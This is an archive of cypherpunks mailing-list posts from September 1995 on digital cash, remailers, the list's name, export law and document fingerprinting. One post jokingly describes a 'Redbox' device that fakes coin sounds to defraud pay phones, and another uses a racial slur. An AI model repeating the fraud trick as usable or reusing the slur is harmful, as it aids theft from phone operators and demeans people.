Date: Fri, 15 Sep 95 06:14:54 PDT
To: cypherpunks@toad.com
Subject: Smart Cards, Credit cards, Payment systems
Message-ID: <199509151314.JAA21423@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.dice.ucl.ac.be/~dhem/card.html


Smart Cards, Credit cards, Payment systems.
   
   This page is under development.
     
_________________________________________________________________

   
   Card Europe
       DigiCash
       MasterCard
        Futur 1 , 2
   Virtual Open Network Environment (V-ONE)
       MONDEX
       AT&T and GiroVend agree to promote smart card 
applications
       AT&T Universal Card Services
       ATT buyinfo
       ibd.ar.com/lists/comp/cypherpunks
       Discussions, mailing lists, and sites , Payment 
mechanisms
       designed for the Internet
       News items on information technology (Not especially 
Smart Cards)
       Electronic Cash, Tokens and Payments in the National 
Information
       Infrastructure
       Forum On Risks To The Public In Computers And Related 
Systems
       (ACM)
        The Risks Digest Volume 4: Issue 32
            The Risks Digest Volume 15
            The Risks Digest Volume 16
   SMI Finger Check -- Fingerprint Verifier
       DIGITAL SRC Research Reports
        Authentication and Delegation with Smart-cards
   Innovonics
       QC consultancy
       University of Wollongong: Centre for Computer Security 
Research
       SecureWare, Inc.
       OKI
       Telecom (Smart) Cards Museum (big)
       Buying Prepaid Calling Card
       S. Brands
       Cyberbank '95
       Electronic benefits transfer (EBT) in US
       NCSA/DTIC Security Seminar
       Power Broker
       First Union Corp. will offer stored-payment ''smart 
cards''
       Network Payment Mechanisms and Digital Cash
       PCMCIA Cards
       THE PREPAID & RECHARGEABLE PHONE CARD
       Cardservice International
       
     
_________________________________________________________________

   
   UCL crypto group
     
_________________________________________________________________

   
   Last update: 11 September 1995.
   Send any comment to: Dhem@dice.ucl.ac.be (J.-F. Dhem)
   
   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Sep 95 09:46:17 PDT
To: cypherpunks@toad.com
Subject: Re: Why ecash is traceable
Message-ID: <ac7efcda09021004ddba@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:47 AM 9/15/95, Donald M. Kitchen wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Excellent discussion on the subject, actually. However, your idea of
>the "first person to the bank" maintaining anonymity via remailer block
>is flawed. First of all, if a collusion with the bank is being taken into
>account, presumably sufficient enough resources are involved that someone
>may try and track the reply block. Mixmaster (as your messages mentioned
>by name) would be necessary to eliminate the chance of tracking the block
>through combinations of replay attacks etc. (Which reminds me, has anyone

Just to clarify a minor point, I mentioned "mixes," not Mixmaster. I have
nothing against Mixmaster, but "mix" is the term Chaum invented for what we
later started to call a "remailer."

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 15 Sep 95 06:53:09 PDT
To: cypherpunks@toad.com
Subject: Loi Log
Message-ID: <199509151352.JAA23300@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


There was an uncharacteristically long delay (2+ hours) in
receiving documents from the 
<http://www.cnam.fr/Network/Crypto/> site, including those 
linked to non-fr sites.


Not sure if it is due to self-applied site restrictions or the 
other loi-logging.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Fri, 15 Sep 95 06:59:18 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <ac7c634618021004e6d8@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.950915090844.29758A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Sep 1995, Timothy C. May wrote:

> >
> >     We too often think of ourselves as an elite - smarter and better in
> >various ways to our non-cpunk neighbours. We refer to these others as
> >'Joe Sixpack" and other such derogatary terms.
> >
> >     The problem is that in doing so we are marginalizing ourselves.
> >
> >     We call ourselves 'cypherpunks'. While this is derived from the SF
> >term 'cyberpunk', consider the image we are creating for ourselves:
> >
> >     A 'punk' is a marginalized young adult, one who rejects the norms
> >of his or her society, and takes delight in irking those around him with
> >his or her rejection. The older of us will think of James Dean in 'Rebel
> >Without a Cause', or Brando in 'The Wild One'. Later, you get images
> >such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and
> >other icons of the 'punk rock' movement.
> 
> While I have had some qualms about the name, on balance I think it has been
> good for us. After all, it's not as if _other_ groups don't already exist!
> In particular, the British branch of Cypherpunks disliked the name
> "Cypherpunks" so much that they used a different name for themselves, the
> "U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for
> whatever reasons. But the name may have been a factor, at least.

I agree with Peter's point... some of the core cypherpunks (I'll not
mention names) can be somewhat elitist, whether they mean to or not.  Not
that they don't have some reason to be...as Pat Farrell once told me the
cypherpunks mailing list is, to some degree, an IQ filter.  Many
cypherpunks have a firm reason for some self-indulgent pride.  However,
our goal (or, at any rate, _a_ goal) is to make crypto use ubiquitous,
and for this we must deal with the public at large in a, perhaps, more
diplomatic and user-friendly manner. 

<snip> 

8> 
> We fill a certain niche which is useful to have filled, a more radical
> facet of things. If we didn't exist, or renamed ourselves "Concerned
> Citizens for Cryptographic Protection," CCCP, then somebody would have to
> _invent_ the Cypherpunks!
> 

True, but if the majority of active participants see an alternative
agreeable to them, they may just switch and start calling themselves
something else.  If the list owner likes it and changes the name of the 
list, then what of the cypherpunks unwilling to change?  It would appear, 
then, that they would be the ones who would have to find somewhere else 
to go.

>            - We are actually not very "punkish" at all. About as punkish
>               as most of our cyberpunk cousins are, which is to say, not
>               very.

Anybody who reads the mailing list or the cyphernomicon knows this, but 
anyone hearing the name for the first time does not get this impression.

> 
> Getting back to your suggestion that "we" change the name to something more
> respectable. How could "we" do this, given that "we" are an effective
> anarchy?
> 
> I can't imagine a vote on this, and the endless debates on what "we" ought
> to call ourselves would be a waste of time.

Better than a vote (and more effective in western culture, where only 39% 
of the population votes anyway but just tends to go with the flow) is to 
propose an alternative, flat out, adopt it for yourself, and whoever 
prefers it will follow your lead.  If nobody likes it, then the 
cypherpunks are simply here to stay.

> 
> Fortunately, there's an elegant solution: form your own group.
> 
> Form your own group, your own mailing list, with a catchy name, something
> like "The Privacy Education Foundation," or "The American Civil Liberties
> Union" (whoops, taken), or "The Society for the Preservation of
> Cyberspatial Liberty."
> 
> Then announce it on our list, and elsewhere. People will vote with their
> feet. If your "meme" is catching, your list will rapidly gain members.
> Maybe this Cypherpunks list will even atrophy away.
> 
> Evolution in action. The market in action. A better approach than trying to
> get the name and the charter changed.
> 

My point is that you may not have to do all this.  This is a recurring 
thread on the list. . . if enough people feel the same way you do you 
could have the human resources effective for a cypherpunks "take-over".

As for myself, I don't think I would change. . . I actually _am_ a 
"long-haired wierdo".  I think a slightly more conservatively named 
organization similar to the cypherpunks would be a good thing, however, 
simply because I like the idea of having something more low-key to compare 
c-punks with, sort of like the IRA to Sinn Fein.  I'm just offering some 
humble advice, knowing full well that I am for the most part an unknown 
lurker without much reputational weight to throw around.  It's also part 
of a leadership dynamic that is, I feel, underused.  (Furthermore, if it 
works, I could use it as a paper topic for my social psychology class ;). )

Sincerely, 
-=Kathleen M. Ellis=-

<ObDCCPPlug> If you can come, don't forget that the DC Cypherpunks are 
having a meet on Saturday at 3pm at Digital Express in Beltsville, 
MD..email me for directions or info on our mailing list. </OBDCCPPlug>

kelli@zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- y+>+(-)
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu

"All the world will be your enemy, Prince With The Thousand Enemies. . .
And whenever they catch you, they will kill you.
But first, they must catch you. . ."
                                           -Richard Adams





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hittinger <bugs@ritz.mordor.com>
Date: Fri, 15 Sep 95 07:02:47 PDT
To: cypherpunks@toad.com
Subject: Oct Byte - Wayner's article heh
Message-ID: <199509151402.KAA10522@ritz.mordor.com>
MIME-Version: 1.0
Content-Type: text



Check it out



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Sep 95 10:30:47 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <ac7f025e0a0210042977@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:58 PM 9/15/95, K. M. Ellis wrote:

(quoting my response)


>> We fill a certain niche which is useful to have filled, a more radical
>> facet of things. If we didn't exist, or renamed ourselves "Concerned
>> Citizens for Cryptographic Protection," CCCP, then somebody would have to
>> _invent_ the Cypherpunks!
>>
>
>True, but if the majority of active participants see an alternative
>agreeable to them, they may just switch and start calling themselves
>something else.  If the list owner likes it and changes the name of the
>list, then what of the cypherpunks unwilling to change?  It would appear,
>then, that they would be the ones who would have to find somewhere else
>to go.

Indeed, if a majority of folks on this list start calling themselves
"Martians" or "Crypto Tools," then I suppose this list will _gradually_
adopt that name. Though even then there are no guarantees, as this list is
run on a machine not controlled by a list democracy.

Go for it! If you wish the folks on this list to call themselves "Concerned
Citizens for Cryptographic Freedom," then start calling yourself that.

What I think would be a waste of everyone's time is a drawn-out series of
proposals for new names, a debate which is unlikely in the extreme to
result in a new name.

>Better than a vote (and more effective in western culture, where only 39%
>of the population votes anyway but just tends to go with the flow) is to
>propose an alternative, flat out, adopt it for yourself, and whoever
>prefers it will follow your lead.  If nobody likes it, then the
>cypherpunks are simply here to stay.

Indeed, some people here have been calling themselves by various names
("CypherGeek," "Crypto Rebel," etc.) for a long time. Personally, I despise
the terms "geek," "dweeb," and "nerd," and think anyone who calls
themselves by these insults is not "reclaiming and deconstructing the
labels of the oppressor class," as the slogan goes, but is merely insulting
themselves. Blacks who call themselves "niggers," homosexuals who call
themselves "queers," and computer programmers who call themselves "geeks"
and "dorks" are all playing the same game.

>"long-haired wierdo".  I think a slightly more conservatively named
>organization similar to the cypherpunks would be a good thing, however,
>simply because I like the idea of having something more low-key to compare
>c-punks with, sort of like the IRA to Sinn Fein.  I'm just offering some
>humble advice, knowing full well that I am for the most part an unknown
>lurker without much reputational weight to throw around.  It's also part
>of a leadership dynamic that is, I feel, underused.  (Furthermore, if it
>works, I could use it as a paper topic for my social psychology class ;). )

The problem is not a "leadership dynamic," the problem is that name changes
are not easily arranged. With 700 people on this list, many of whom appear
to _like_ the name, how long will it take before enough want to change to
make it so? And who says democracy is such a good thing? What if 200 want
to change, 100 don't, and the rest don't care or don't "vote"?

A better approach is for the "conservatives" who want a "more conservative"
name to simply do what I suggested: form a new group and name it what they
like. They wouldn't have to quit this list, they would just be able to
cleanly recruit for their new list.

Seems simple to me. And honest. And less devisive than trying to change the
name of a group with a long history (by modern standards) and with several
well-known achievements.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Fri, 15 Sep 95 07:35:57 PDT
To: Tom Rollins <kelso@netcom.com>
Subject: Re: Why ecash is traceable
In-Reply-To: <199509151220.FAA00243@netcom4.netcom.com>
Message-ID: <Pine.A32.3.91.950915103403.44707A-100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 15 Sep 1995, Tom Rollins wrote:

> Just a little humor...
> Perhaps Electronic Cash has a sound.
> Phone Phreakers have something called a Redbox.
> This device makes the sound of a quarter.
> When an ATT pay phone asks you to deposit $1.75
> you just make the sound of 7 quarters... :)

New Zen koan?  What is the sound of 7 quarters *not* being deposited?

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMFmPJKDthkLkvrK9AQEPdgP/S7OTS7EjSSNiwFgFPFdgs+gymPKVgUaT
5iuSEXGxHJDSzdZocuA7NoT4OUvpYriC7Lkk3uaSQ5kNPX/2veXzEowh1+nFfDmq
8Lgay1MpanwOlZC3F/VrBJP6m2eZtUdhN+qejccqyU0EiQZN1idUkpFCel9D6lu+
TYmkRLVGDOc=
=KjF7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Taffs <dat@ebt.com>
Date: Fri, 15 Sep 95 10:39:33 PDT
To: cypherpunks@toad.com
Subject: [revcoal@pcnet.com: Re: The owls are not what they seem]
Message-ID: <9509151740.AA06675@veronica.EBT.COM>
MIME-Version: 1.0
Content-Type: text/plain



fyi...

Date: Fri, 15 Sep 1995 00:02:33 -0400 (EDT)
From: "Donna J. Logan" <revcoal@pcnet.com>
To: Marilyn159@aol.com
Cc: Search Net <snet-l@world.std.com>
Subject: Re: The owls are not what they seem
In-Reply-To: <950912141715_17265559@mail06.mail.aol.com>
Mime-Version: 1.0
Sender: snet-l-approval@world.std.com
Precedence: bulk
Reply-To: snet-l@world.std.com
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Length: 1330

It's your service provider....same thing happened to a whole bunch of
us when we used to be on it...and only selective posts to selective lists.
Look to the headline's your provider has generated the past few days and
you'll get a clue as to what's going on...except the net spread by them and
the feds is a lot wider than just kiddie pornographers.

BTW, I'm being cagey in actually mentioning your service provider's name/
initials, as we found that was one of the "keywords" in the filter program
used by them and a certain national police agency (who's initials also 
trigger the filter program) to flag posts which they thought may be 
"interesting", resulting in delays of up to days in posting.  Same thing
happened in live chat in PRIVATE chat rooms, we were able to bring the
system to a complete halt by just typing the initials of Frederico's
Bumbling Idiots....

The only solution to Amerigo's Obnoxious Lackeys was to cancel our 
accounts and switch to CHEAPER local service providers, who also happen
to provide BETTER service, with no censorship/surveillance.

;->

On Tue, 12 Sep 1995 Marilyn159@aol.com wrote: 
> This is so weird...
> Only pieces of the message I sent are getting through. This is a little bit
> more but not the whole thing.
> Where is the rest of it?
> Is this censorship or computer error?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: syrinx@c2.org (Syrinx Anonymous Remailer)
Date: Fri, 15 Sep 95 10:57:40 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509151752.KAA04838@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Meaning:  In all cases, if a page is being shown and
>it links to another page, then the other page is being
>shown.
>I wonder if I have a pornopage.

Does this mean that if I have a link to Infoseek or
another search engine, that I, too, am hosting
pornography?  

Which would be an interesting idea as far as trying to
present a "safe" way to search the Internet.  A web-
crawler or other search mechanism of choice could be started
up, and simply refuse to run searches for certain keywords.
Ideally (but impractical) any pages dug up that contain
the questionable words could be manually checked.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 15 Sep 95 02:57:45 PDT
To: rsalz@osf.org
Subject: Re: Linking = Showing = Transferring?
Message-ID: <9935.9509150957@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz <rsalz@osf.org> writes:
> >Suppose we interpret Linking = Showing as
> >
> >For all web pages x and y,
> >Showing(x) and  Linkto(x,y) --> Showing(y)
> 
> Then we would be fools.  No more so than buying a book means you
> have instant access to all resources mentioned as footnotes or in
> the bibliography.
> 
> Put more simply, *you have to click on Y* so they're not the same.

Another even more subtle problem is inline images, can you say that a
page with an inline image sourced from a foreign site must obey the
foreign jurisdiction.  I would assert this is so, because the web
surfer's *browser* imports the relevant parts of the page from
whatever locations (and jurisdictions) they are in, and displays them
as one page.

Take a look at:

	http://www.obscura.com/~shirt/

which is the www space Lance kindly donated for the UK munitions-T.
The relevance to this discussion is that www.obscura.com is of course
in the US, whilst the inline graphic is in the UK for ITAR reasons,
the is of:


#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)


ie the html looks like:

	<img src="http://www.dcs.ex.ac.uk/~aba/obscura/rsa.gif">

So that the image is *imported* by the *viewer*, and not supplied by
www.obscura.  This means that people outside the US can also view the
page with out anyone breaking any laws, even though it appears to
contain (allegedly) ITAR contravening material.

Same would apply quite nicely to porn from the netherlands etc.

[as an aside, any one got info on how you go about converting gifs to
transparent gifs - I want the above to be transparent so that it still
works on other than a black background in case other people use it on
other backgrounds]

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 08:13:26 PDT
To: cypherpunks@toad.com
Subject: Re: Linking = Showing = Transferring?
Message-ID: <9509151512.AA08301@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> I think this case is safer than the porn one, because the actual data
> in this case is legal in both jurisdictions, it just must not be
> transferred from jurisdiction US -> jurisdiction non-US, which it has
> not been.

I believe you're right, this is the key distinction which I missed.
(Disregard my earlier email to you :)

Thanks for the patient explanation.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Fri, 15 Sep 95 10:13:36 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Why ecash is traceable
Message-ID: <v01510100ac7f533817cc@[198.59.115.130]>
MIME-Version: 1.0
Content-Type: text/plain


Timothy May wrote,
>I don't think all systems must be able to deal with double spending.
>
>For example, the first person to read this number: 45%2)d[12ks&Qmdx and to
>then submit it any form--in person, by e-mail, via remailer, etc.--to The
>First Bank of Cyberspace will have $10 sent to him or her, as cash or as a
>spendable amount of digicash (untraceable to recipient, of course).

I would expect that services might emerge that would strengthen this
without the bank getting involved and without loss of anonymity.

It might emerge that because of the bank's lack of handling of double
spending that in some transactions some payees would request a money order
from a trustee.  The payee might supply the list of money order suppliers
allowed for that day.  If the payee does not want the money order addressed
with a public key, he can supply a set of alternate keys each encrypted for
an acceptable trustee.  The money order allows the payee to be as sure that
the cash is good as he trusts the trustee (and the bank).

With or without the use of a remailer this can add to hiding the payer.
However, unless the payee provides a hidden key, the trustee does know who
received some payment.  The trustee is highly motivated to operate a
memoryless system (except for the trustee's own cash) and might be audited
to ensure this to both customers and potential physical raiders.

The cash bundled in the money order need not be that returned from
exchanging the money order payment.  Some trustees might return a money
order containing cash that has other properties, too.

If the payee really trusts the trustee, then no race to exchange the cash
is needed--hiding the payee further.  The payee can exchange it over a
period of time or as needed.  Exchange includes indirect exchange as in
buying money orders.

I'm new to protocols and I mention details below only to add hopefully
clarifying material, not to suggest that I have any idea of the right ways
to do these things.  These can be implemented using PGP.

Money Order:
The automated trustee checks the money (for money order amount and fee).
If it is bad the trustee sends it back.  Otherwise, the trustee exchanges
the cash and then selects from cash on hand cash of the amount of the money
order.  This is encrypted for the payee.  (The buyer must supply something
the trustee would know how to use to encrypt for the payee: public key or
message addressed to the trustee containing information on how to encrypt
for the payee.)  The money is encrypted with that.  A description is added
to this and it is signed by the trustee and sent back to the payer.  The
description may or may not mention the payee depending on whether the money
was wraped with a public key or not.

Escrowed Money Order:
The trustee creates a money order that can be opened by either the payer or
payee and encrypts that for the escrow agent.  A description and signature
is added.

Generalization:
Payees and escrow agents can be abstract recipients such as and/or lists.

I wonder how much I could charge for this.

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Sep 95 11:14:05 PDT
To: cypherpunks@toad.com
Subject: Crypto + Economics + AI = Digital Money Economies
Message-ID: <ac7f084d0b0210048e66@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Dar Scott proposes some extensions to digital cash to deal with the issues
being discussed here. He mentions "money orders" and "escrowed money
orders," and he alludes to "trustees," or agents that would behave in
certain well-defined ways.

This is as good a place as any to address a point I've been thinking about
for a long while, and which I've touched on before. Namely, that the
"ontology" of digital money, the instruments and forms it can take, are
_impoverished_ compared to the real world.

In my eight years of following digital cash work, I've been struck with how
little _economics_ enters the fray. Many of the protocols that seem to have
problems from a purely cryptographic point of view seem to get fixed when
additional _economic_ considerations are included (the consideration we
cite the most is "reputation," and we debate this endlessly). The PGP "web
of trust" is a kind of example of this additional consideration, if we make
certain fairly reasonable assumptions about the nature of collusion. (Lots
of stuff to get into here, but I want to make some other points and not get
too sidetracked.)

"Digital money" currently has only a few ways of dealing with transfers of
value in transactions. A lot of the problems come, in my view, from this
relatively spartan set of "primitives."

Where are the cryptographic equivalents of:

- money orders

- promissary notes

- receipts

- warrants

- lockboxes

- bearer bonds

- options

- time deposits

- coupons

- escrow

- IOUs

- zero coupon bonds

- checks

...and so on. The terms in any good dictionary of financial terms (such as
the "MIT Dictionary of Modern Economics," ed. by David Pearce, 1992). (Many
of these things are built up out of more basic things, with mix-ins from
other classses, or with modified methods.)

A look at any book on money and finance shows a rich "microworld" of
"things" and "procedures" (classes and methods attached to classes). The
classes have subclasses, and the methods have various behaviors and
"expectations" attached (more than just simple class behavior, more of an
AI or agent flavor, in my view).

(AI is somewhat of a dirty word these days, due to hyped expectations. But
many of the methods have been useful in limited domains. The domain of
financial transactions, with the classes and methods hinted at above,
involve a lot of formal manipulations and expected behaviors.)

In the real world, as the "base class" of "things traded" (tangible assets)
reached various limits, a new class of "money" was created, where money was
gold, silver, spices, etc., that could be more easily transported and
stored. And so on, through levels of abstraction (marks on clay tablets,
entries in ledger books, issuances of certificates, bonds, derivatives,
etc.)

My point is not to recap views of the history of money in its many forms,
or even to give my views on the "ontology of money," but to say that many
of the problems we think are present in current digital money systems may
largely result from the impoverished set of base classes of digital money.

To me, an exciting project is to take the basic cryptographic protocols and
build up more structured objects (blobs, envelopes, seals, etc.), and then
incorporate these into even more complicated financial instruments.

There have been proposals for crypto class libraries, most recently in Ray
Cromwell's detailed plan for C++ crypto classes. Others I have been in
communication with have expressed interest in doing the same thing in
Smalltalk, given that many financial companies are doing a lot of their
complicated transactions in Smalltalk. And Java has just entered the
scene....

My point is not to argue for any particular language approach, or even to
argue for this "ontology of digital money" as a Cypherpunks project, but to
share with you some thoughts.

I think significant progress will have been achieved when these "financial
objects" can be launched and used without a lot of hand-tuning and human
intervention. In fact, an "economic microworld" of agents/actors
interacting and trading in various forms of digital cash and derivatives
would be an exciting "artificial life" example, and one which would test
the robustness of protocols. I don't think this is beyond the current state
of the art by too much.

I'm working on bits and pieces of this, but progress has been slow....

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@law.miami.edu>
Date: Fri, 15 Sep 95 08:15:42 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: DD, pedophiles, and Terrorists, oh my
In-Reply-To: <199509150908.CAA22145@ix3.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950915111440.12462D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


FOIA doesn't work for stuff pertaining to ongoing LEA activity or cases 
pending in court.  (simplified summary of complex rule)

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Hemming CEO MarketNet"  <JohnHemming@mkn.co.uk> (by way ofrah@shipwright.com (Robert Hettinga))
Date: Fri, 15 Sep 95 08:23:21 PDT
To: cypherpunks@toad.com
Subject: More on ECheques
Message-ID: <v02120d01ac7f4a0f2771@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Version 0.1 (beta) of WorkHorse has now been put on the ftp site together
with instructions as to how to use it to pay for things with ECheques.

You are welcome to test ECheques on our live floristry service.  To
do this:

1.  Download WorkHorse ftp://193.119.26.70/mktnet/pub/horse.zip
2.  Follow the instructions for generating a key.
       a) Generate Key  System/security/key gen (please use 512 bits)
       b) Specify your user details Alter/my details (put in a bank a/c no)
3.  Don't worry about registering the key (unless you really want the
     flowers and have a BankNet account)
4.  Try
     http://alpha.mkn.co.uk/load ordflow   .. or
     http://beta.mkn.co.uk/load ordflow   .. or
     http://epsilon.mkn.co.uk/load ordflow
5.  Don't fill in credit card details .   Please put a name of Test or
     testing.  Click the button for ECheque (or electronic cheque)
6.  Send the form.

If you can easily trace the conversation it will be interesting.  The
system will automatically go into SSL with 128 bit RC4.  It will generate
a signed instruction and transmit that in the secure session.  If you want
to see how the form works save the html source.  You can set it up
on another server and receive the signed instruction yourself if you
want.  You can use workhorse to check the signature.

(The first live ECheque was issued on Wednesday).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@dxm.org>
Date: Fri, 15 Sep 95 11:58:47 PDT
To: rishab@infinity.c2.org
Subject: "Use implies consent to monitoring"
Message-ID: <199509151853.LAA10932@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



In the InterNIC notice on fees for domain names that marks the end
of an era, (http://rs.internic.net/announcements/fee-policy.html)
I noticed this gem of a postscript:

   Please be advised that use constitutes consent to monitoring

     (Elec Comm Priv Act, 18 USC 2701-2711).


----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 09:23:02 PDT
To: fair@clock.org
Subject: Re: NSA on GAK
Message-ID: <9509151622.AA08762@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Yeah, really.  I didn't say it isn't true, I just said it's more like a
cute quote than truth.

Compare the number of bits downloaded in TCP/IP and routing infrastructure
to the number of bits that are purchased at the store or via a P.O.
Miniscule.
	r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Fri, 15 Sep 95 22:30:29 PDT
To: cypherpunks@toad.com
Subject: Re: Digital Fingerprinting
Message-ID: <m0stpnG-00066MC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


On 12 Sep 95 at 11:27, Andrew Loewenstern wrote:


> Such technology would be very useful in business, especially the
> high-tech  industry.  Think of how many non-disclosure agreements
> are signed every day  relating to new products developed for the
> software industry alone.  Many  companies are very paranoid and
> already 'fingerprint' information by using  unique code-names for
> projects, for instance.  i.e. the spec sheet on their  new GAK
> crypto product they give to Alice may be code-named 'project foobar'
>  but the one they give to Bob may be code-named 'project burris'... 
> Then,  when the information leaks out they check which person they
> gave the document  with that code-name and they know who to sue (or
> at least not give any more  trade-secrets to).  It's very simplistic
> but it has been know to work in the  past.
> 
> Most of the real technology for doing this is much better, of
> course...   However, what stops you from printing out a
> fingerprinted document and  scanning it back in, for instance?

Well, there is selective wording, mispellings, punctuation and
formatting. These can be corrected easily if allowed to be
transported as a text or common file type.

Another  way is to place the document in a PItA proprietary graphical
format for transport and viewing only, stego identifier imbedded if
you chose * , so that every portion of the document has some
indentifier imbedded in it. Many obvious and many devious. Electronic
drawings with a harmless and useless circuit(s) added on , software
with do nothing code (by design!:) ).  Difficult and time consuming
to do, but for megabuck items, no prob. Automated for an additional
fee of course. Start a service industry for such, make money, pay me
back by running a fast, reliable remailer.

Idea is to make the thief go to some major effort and if the scanning
option is used to make the deletions  as obvious and telling as the
former identifier.

> andrew

